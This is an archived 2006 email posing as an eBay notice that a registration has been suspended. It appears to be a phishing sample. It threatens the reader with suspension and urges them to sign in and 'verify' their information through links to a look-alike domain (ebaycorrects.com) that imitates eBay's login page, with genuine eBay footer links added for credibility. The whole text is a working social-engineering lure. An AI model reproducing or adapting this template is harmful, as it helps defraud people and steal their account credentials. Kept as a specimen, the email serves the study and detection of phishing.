Subject: TKO NOTICE: eBay Registration Suspension - Possible Unauthorized Account Use

From: eBay <[email-masked]>
Date: Fri, 11 Aug 2006 21:14:35 -0400

[1]From collectibles to cars, buy and sell all kinds of items on eBay 

    Dear Ebay User! []
   During our regular update and verification of the accounts, we verify your
   current information.
   Either your information has changed or it is complete.

   Please verify your information simply by signing your account go to
   [2]eBay.com
   If the account is not [3]Sign out your access to bid or buy on eBay will be
   restricted also ignoring this message can will cause the Suspension of your
   account.

   Per the User Agreement, Section 9, we may immediately issue a warning,
   temporarily suspend, indefinitely suspend or terminate your membership and
   refuse to provide our services to you if we believe that your actions may
   cause financial loss or legal liability for you, our users or us. We may
   also take these actions if we are unable to verify or authenticate any
   information you provide to us.
   Due to the suspension of this account, please be advised you are prohibited
   from using eBay in any way. This includes the registering of a new account.
   Please note that this suspension does not relieve you of your
   agreed-upon obligation to pay any fees you may owe to ebay.

   We appreciate your support and understanding, as we work together to keep
   eBay a safe place to trade. Thank you for your patience in this matter.
   Please do not reply to this e-mail as this is only a notification.
   Mail sent to this address cannot be answered.

   Regards,
      Safe harbor Department eBay, Inc.

Visit our [4]Privacy Policy and [5]User Agreement if you have any questions.

              Copyright Â© 2005 eBay Inc. All Rights Reserved.
   Designated trademarks and brands are the property of their respective
                                  owners.
             eBay and the eBay logo are trademarks of eBay Inc.
           eBay is located at 2145 Hamilton Avenue, San Jose, CA 95125.

References

   1. http://ebaycorrects.com/
   2. http://ebaycorrects.com/
   3. http://ebaycorrects.com/eBayISAPIdll.php?SignIn
   4. javascript:ol('http://click3.ebay.com/36878583.60168.0.40453');
   5. javascript:ol('http://click3.ebay.com/36878583.60168.0.40451');